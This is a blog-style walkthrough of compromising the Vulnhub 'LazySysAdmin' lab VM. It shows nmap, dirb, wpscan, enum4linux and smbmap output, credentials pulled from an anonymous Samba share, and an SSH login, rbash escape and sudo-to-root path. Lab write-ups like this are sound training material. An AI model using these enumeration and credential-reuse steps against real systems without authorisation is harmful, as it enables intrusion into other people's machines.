Vulnhub: LazySysAdmin Boot2Root VM

Introduction

For my second Boot2Root write up I’ll document the process which I followed to fully compromise the “LazySysAdmin” VM, created by Togie Mcdogie and hosted by vulnhub

The aim of this VM to go from a remote user to achieving root level access to the machine. Mr Mcdogie says on Vulnhub “Enumeration is key” under the hints section, and he wasn’t joking!

Let’s go.

 

Recon

I’ll skip the host discovery phase as it’s reasonably straight forward (simply a case of running netdiscover and making a cup of tea while it checked for live hosts in my subnet)


root@kali:~# nmap -sV -T5 -p- -e eth1 192.168.56.103Stats: 0:00:10 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
Nmap scan report for 192.168.56.103
Not shown: 65529 closed ports

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL (unauthorized)
6667/tcp open  irc         InspIRCd
MAC Address: 08:00:27:EC:86:3F (Oracle VirtualBox virtual NIC)
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

 

The nmap service scan informs us that the above services are running. Interesting ones here being Apache, InspIRCd and Samba.

Enumeration

Vulnhub advised us that Enumeration was key with this box, so we’ll start by enumerating Apache.

Apache

First up we’ll run dirb to get an idea of the directories available on the site.
dirb http://192.168.56.103

---- Scanning URL: http://192.168.56.103/ ----

==> DIRECTORY: http://192.168.56.103/apache/  
+ http://192.168.56.103/index.html (CODE:200|SIZE:36072)            
+ http://192.168.56.103/info.php (CODE:200|SIZE:77268)   
==> DIRECTORY: http://192.168.56.103/javascript/         
==> DIRECTORY: http://192.168.56.103/old/         
==> DIRECTORY: http://192.168.56.103/phpmyadmin/     
+ http://192.168.56.103/robots.txt (CODE:200|SIZE:92)  
+ http://192.168.56.103/server-status (CODE:403|SIZE:294)     
==> DIRECTORY: http://192.168.56.103/test/              
==> DIRECTORY: http://192.168.56.103/wordpress/       
==> DIRECTORY: http://192.168.56.103/wp/   

 

As we can see, there are numerous interesting subdirectories here with wordpress and phpmyadmin being of particular interest.

A quick curl of info.php reveals that it is just printing <?php phpinfo() ?> behind the scenes, which is useful for gathering more information about the web server installation.

Next up we’ll see if there’s anything juicy in the robots.txt (this is an old-skool way of finding interesting directories, still yields results occasionally) –

root@kali:~/samba# curl 192.168.56.103/robots.txt
User-agent: *
Disallow: /old/
Disallow: /test/
Disallow: /TR2/
Disallow: /Backnode_files/


But upon further inspection none of these directories are of interest. old/test/TR2 are all broken and Backnode_files is just an indexable directory full of static content. Meh.

 

WordPress

dirb told us that there was a wordpress installation available, so we’ll use the excellent wpscan tool to establish if there’s any interesting misconfigurations in the installation.
root@kali:~/samba# wpscan --url http://192.168.56.103/wordpress

.....................SNIP.....................
[+] Interesting header: SERVER: Apache/2.4.7 (Ubuntu)
[+] Interesting header: X-POWERED-BY: PHP/5.5.9-1ubuntu4.22
[!] Registration is enabled: http://192.168.56.103/wordpress/wp-login.php?action=register
[+] XML-RPC Interface available under: http://192.168.56.103/wordpress/xmlrpc.php
[!] Upload directory has directory listing enabled: http://192.168.56.103/wordpress/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://192.168.56.103/wordpress/wp-includes/

[!] 7 vulnerabilities identified from the version number

[!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
[i] Fixed in: 4.8.2

[!] Title: WordPress 2.9.2-4.8.1 - Open Redirect
[i] Fixed in: 4.8.2

[!] Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping
[i] Fixed in: 4.8.2

[!] Title: WordPress 4.4-4.8.1 - Path Traversal in Customizer 
[i] Fixed in: 4.8.2

[!] Title: WordPress 4.4-4.8.1 - Cross-Site Scripting (XSS) in oEmbed
[i] Fixed in: 4.8.2

[!] Title: WordPress 4.2.3-4.8.1 - Authenticated Cross-Site Scripting (XSS) in Visual Editor
[i] Fixed in: 4.8.2

[!] Title: WordPress 2.3-4.8.2 - Host Header Injection in Password Reset
 
.....................SNIP.....................

 

So lots of information was disclosed (server type and version, php version) there appear to be numerous vulnerabilities associated with this particular version of WordPress, if we run out of things to enumerate then we at least have options here for potential ‘ins’.

A quick poke around the wordpress instance using our web browser highlights a few nuggets of information –

Key info here is that the admin username is “Admin”, they like yogibear and the word “togie” is relevant somehow. Knowing this LazySysAdmin that’s probably a username on the box, eh?

PhpMyAdmin

A quick poke around the PhpMyAdmin install reveals that it’s (at first glance) secure. Disallowing empty logins and the usual suspects (root:password, root:root, admin:password……….) are all blocked. Hrm..

Samba

We decide to change tact at this point and take a look at what’s occurring with the Samba installations. Samba is a common source of misconfiguration and quite often reveals far more than it should do.
First up we run enum4linux to enumerate the Sambas to get some basic data (domains, shares, users, permissions)
enum4linux 192.168.56.103

 

This provides us with tonnes of information, but the key parts are highlighted below:

1) Domain name is WORKGROUP and Samba is allowing anonymous logins.

 

2) The names of the shares which anonymous users can access.

3) A username on the target system (our old friend Togie)

Armed with all of this information we could go a couple of different ways. We could either bruteforce togie’s password using acccheck or hydra, or we could enumerate those shares using either smbmap or smbclient.

We choose smbmap because I’ve never used it before and I want to learn 🙂

Edit: For future reference the following command could have been used to the same ultimate effect – smbclient \\LAZYSYSADMIN\share$

/usr/share/smbmap/smbmap.py -u '' -p ''  -H 192.168.56.103 -d WORKGROUP

[+] Finding open SMB ports....
[+] Guest SMB session established on 192.168.56.103...
[+] IP: 192.168.56.103:445 Name: 192.168.56.103                                    

Disk                                                   Permissions
----                                                   -----------

print$                                             NO ACCESS
share$                                             READ ONLY
IPC$                                               NO ACCESS

 

Sounds like share$ is the one which we’re interested in.

A few interesting things jump out to us here. deets.txt and todolist.txt. We’ll come back to these in a second.

More enumeration using smbmap shows us that the wordpress/ directory is readable and most importantly so is wp-config.php which means that we can get the database passwords. Result.

using smbclient’s -A option we pull all PHP files out of the application for later perusal –

root@kali:~/samba# /usr/share/smbmap/smbmap.py -u '' -p ''  -H 192.168.56.103 -d WORKGROUP -r share$/wordpress -A 'php'

<..................SNIP..................>
[+] Match found! Downloading: share$wordpresswp-config.php

fr--r--r--             3703 Mon Aug 21 10:25:14 2017 wp-config.php

<..................SNIP..................>


catting wp-config.php gives us some very juicy info –

 

Database, database user and password. Pretty decent password actually!
In the interest of saving some time I’ll summarise this finding as follows:
  1. Admin:TogieMYSQL12345^^ is a valid login for PhpMyAdmin and WordPress, so at this point you have database level control
  2. root:TogieMYSQL12345 is a valid PMA login (note the absence of ^^ on the end of the password), not sure if this is an easter egg or not.
  3. Neither of these things can be leveraged to get us a shell…
And so we move on to checking deets.txt which we found earlier whilst enumerating Samba.

root@kali:~/samba# curl 192.168.56.103/deets.txt

CBF Remembering all these passwords. Remember to remove this file and update your password after we push out the server. Password 12345 

On a whim I tried to ssh to togie@192.168.56.103 using password ‘12345’ and…

Endgame

Successfully SSH’d to the box as user togie now. Running the usual checks shows nothing interesting in his home directory but does highlight the fact that the user is inside of a restricted shell –

togie@LazySysAdmin:~$ ls /home-rbash: /dev/null: restricted: cannot redirect output
bash: _upvars: `-a2': invalid number specifier
-rbash: /dev/null: restricted: cannot redirect output
bash: _upvars: `-a0': invalid number specifier

 

The restricted shell means that this user can’t execute any command with a forward-slash in it.. Execute bash to escape the restricted shell and get an unrestricted shell.

togie@LazySysAdmin:~$ bash
togie@LazySysAdmin:~$ ls /home
togie

 

Sorted 🙂 Let’s see what togie can run with sudo..

 

togie@LazySysAdmin:~$ sudo -l

[sudo] password for togie: 

Matching Defaults entries for togie on LazySysAdmin:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin


User togie may run the following commands on LazySysAdmin:

    (ALL : ALL) ALL

 

Uhh…. Game over then, as togie can run any command as root.

 

 

Conclusion

I really, really enjoyed this box. There were a few really unique and realistic touches –
  • No pre-canned vulnerabilities
  • Simple misconfigured security lead to total compromise
  • Interesting twist with the restricted shell
Many thanks to Togie Mcdogie for creating this VM, it was great 🙂

 

Add a Comment

Your email address will not be published. Required fields are marked *

I accept that my given data and my IP address is sent to a server in the USA only for the purpose of spam prevention through the Akismet program.More information on Akismet and GDPR.